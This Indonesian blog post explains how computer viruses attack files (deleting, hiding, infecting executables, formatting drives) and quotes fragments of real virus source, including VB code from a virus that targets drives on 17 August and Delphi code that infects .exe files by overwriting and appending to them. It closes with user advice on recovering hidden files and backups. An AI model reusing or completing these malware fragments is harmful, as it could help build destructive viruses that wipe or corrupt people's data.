Sabtu, 08 Oktober 2011

Virus dan ulahnya di file yang terjangkit

Kebanyakan virus  melakukan penyerangan (pengerusakan) terhadap file-file komputer korbannya. 
Serangan  virus ini  yang  sangat  ditakuti  oleh pengguna  computer.  Tetapi  jika  virus  tersebut  hanya
melakukan penyebaran itu bukan masalah karena tidak melakukan pengerusakan jadi si korban tidak
merasa begitu dirugikan. Lalu bentuk-bentuk serangan apa saja yang dilakukan virus pada file?
Bentuk-bentuk serangan yang dilakukan virus pada file:
1.  Menghapus,  memindahkan,  menyembunyikan  dan  mengerusak  file(harap  jangan  sampai
merusak isi file karena sapa tahu file itu sangat penting mungkin file tersebut tulisan skripsi ato
apalah yang tentunya begitu berarti bagi user(patuhi  saran  vm yang baik  )
2.  Infeksi  terhadap  file,  biasanya  virus  melakukan  ini  untuk  melindungi  dirinya  dengan  cara
menempel dirinya pada file yang ingin di infeksi. Biasanya file*.exe, *.com,  dll.
3.  Memformat partisi dan menghapus partisi (harap bagi vm jangan lakukan ini  karena selain
memusnahkan virus sendiri juga memusnahkankan data orang).
4.  Menyembunyikan folder asli lalu membuat folder palsu dengan nama yang sama tetapi folder
tersebut sebenarnya adalah file virus berekstensi .exe hal ini juga dapat dilakukan pada file
dengan ekstensi2 tertentu  yang diinginkan sang vm untuk dibuat file palsunya.
Bentuk-bentuk serangan diatas adalah bentuk serangan yang paling sering dilakukan oleh virus untuk
melakukan  manipulasi  terhadap  suatu  file  .  Menghapus,  memindahkan  dan  menyembunyikan  file
merupakan hal yang sangat sering digunakan oleh virus. Bahkan hampir semua virus menggunakan
tehnik ini untuk melakukan manipulasi terhadap suatu file.  Infeksi terhadap file exe, com, dan scr
sangat jarang ditemukan karena teKnik ini cukup sulit dilakukan

Gambar didatas adalah source virus merdeka yang saya dapatkan dari teman saya Riyanto virus ini
cukup sadis karena melakukan format pada tanggal yang sudah ditentukan oleh sang VM(17-08):
   TanggAl = Format(Now, "dd-mm")
            If TanggAl = ("17-08") Then
                GetFiles sdrive, True, "*.*"
            End If

harap bagi vm jangan lakukan ini karena selain memusnahkan virus sendiri juga memusnahkan  data
orang.
Selain melakukan format virus ini juga melakukan pencemaran pada file berekstensi .exe lalu dilakukan
penambahan ekstensi didepan ekstensi asli tersebut dengan ekstensi-ekstensi yang sudah didaftar oleh
VM:
Sub NyaRi()
Dim TanggAl
Dim ictr As Integer
Dim sdrive As String
  For ictr = 68 To 90
    sdrive = Chr(ictr) & ":\"
'ekstensi yang akan di tambahkan sebelum ekstensi .exe
      GetFiles sdrive, True, "*.txt"
      GetFiles sdrive, True, "*.pdf"
      GetFiles sdrive, True, "*.rtf"
            TanggAl = Format(Now, "dd-mm")
            If TanggAl = ("17-08") Then
                GetFiles sdrive, True, "*.*"
          End If
End Sub

Jadi misal Komputer telah terinfeksi virus ini lalu kita menyolokkan flashdisk yang didalamnya terdapat
file misal KaHt.exe file tersebut akan di manipulasi oleh virus tersebut sehingga menjadi file peranakan
virus  dengan  nama  KaHt.txt.exe  (catatan  oleh antivirus  biasanya  double  ekstensi ini  sudah  sangat
dicurigai sebagai virus /FakeExtention). Ada pula virus build-an Delphi yang bisa memanipulasi file    
 Pertama lakukan prosedur pencarian file dengan ekstensi.exe
  If UpperCase(ExtractFileExt(Sr.Name)) = UpperCase('exe') Then InfeksiFile(Dir + Sr.Name);
            //cari ekstensi .exe lalu lakukan infeksi file
UpperCase = function UpperCase
berisi indentifikasi nama file yang akan di racuni
 if (Ch >= 'a') and (Ch <= 'z') then Dec(Ch, 32); //untuk membaca nama file
dimana   Ch: Char;
ExtractFileExt=function ExtractFileExt
Result := Copy(Filename, i + 1, Length(Filename)); //meng-copy dgn filename sama + size(1)
lalu lakukan infeksi file:
CopyFile(pChar(ParamStr(0)), pChar(Name), False) Then Exit;
  Settings := #00 + GenerateName + #02 + IntToStr(Length(FileBuffer)) + #01;
  AssignFile(F, Name);
  Append(F);
  Write(F, FileBuffer);
  Write(F, Settings); //tulis file f + setting (manipulasi)
  CloseFile(F);

Hasil dari infeksi file ini adalah misal computer telah terinfeksi virus ini lalu kita menyolokkan flashdisk
yang  didalamnya  terdapat  file  misal  KaHt.exe  file  tersebut  akan  di  manipulasi  oleh  virus  tersebut
sehingga menjadi file peranakan virus dengan nama KaHt.exe (tetapi icon file tersebut bukan ikon
sebenarnya melainkan telah dirubah menjadi sama seperti  icon file induk virus,menandakan bahwa file
tersebut sudah dimanipulasi oleh virus)
begitulah ulah-ulah virus  pada file jadi setelah mengetahui tingkah laku virus yang sudah saya terangkan
apa anda hanya akan menjadi naive user (user awam) yang masa bodoh? Menyerahkan semuanya pada
antivirus atau orang yang pinter komputer? Lalu misal data/document  di komputer/flashdisk tiba2
lenyap dimakan virus (dimakan emang laper virusnya?) lalu apa yang anda lakukan? Cek dulu benar2 di
delete oleh virus atau hanya di hidden aja? Caranya klik Tool-Folder Options- View- pilih Show Hidden
Files and Folders sekalian hilangkan ceklist pada Hide protected operating system files (Recommendet)-
Ok .Nah keliatankan kalo Cuma dihidden yah tinggal hilangkan attribute hiddennya selesai kan?data
telah kembali seperti sediakala. Namun jika data/document tersebut di delete oleh virus maka anda
harus melakukan restor (restor pakai apa? Pakai software Restoration banyak kok cari sendiri yah
hehehe )
Saran  saya  lakukan  back-up  atas  data-data  pribadi  anda  terutama  data-data  yang  sangat  penting
,burning,  simpan  di  flashdisk,komputer  temen  dll  jadi  klo-kalo  kena  virus  dan  data  hilang  masih
mempunyai cadangannya. Jika tidak sempat di back-up saya punya trick simpan aja di internet misal di
4shared, ziddu, rapidshare,dll tapi ingat data yang penting di pack dan dilengkapi password biar aman
hehehe 
Saya tahu anda lebih pintar dari saya jadi orang yang pintar pasti tidak akan mendengarkan kata2
orang bodoh seperti saya ini hik 
Biografi Penulis
Anharku.  Pertama  mengenal  komputer  saat  SMP  pertamanya  kenal
komputer hanya bermain game bawaan window's lambat laun karna
pergaulan  dan  pertumbuhan,  merasakan  anehnya  cinta
monyet...patahhati lalu melampiaskannya pada bermain Game online
namun karena satu persatu game itu servernya runtuh (gameOver kali)
jadi aku memutuskan vakum dari dunia gamer waktu itu juga saat aku
masih UAS jadi aku fokus ke skull dulu.Lanjut mengenal dunia internet
sejak hobi main di warnet untuk sekedar mengecek e-mail, fs, dan sekedar chatting ga jelas..Dari
temanku bernama DNZ lah aku mulai mengenal dunia virus..lalu aku belajar secara otodidak karna
temanku DNZ lebih suka dunia Hacking. Belajar algoritma dan pemrograman, membuat flowchart, dan
belajar bahasa pemrograman seperti visual basic, delphi, C++, pascal, asmbly. Belajar tentang micro,
website, PHP, Basis data, MySQL, belajar tentang Jaringan Komputer..belajar tentang segala sesuatu
yang berbau komputer.

Tidak ada komentar:

Posting Komentar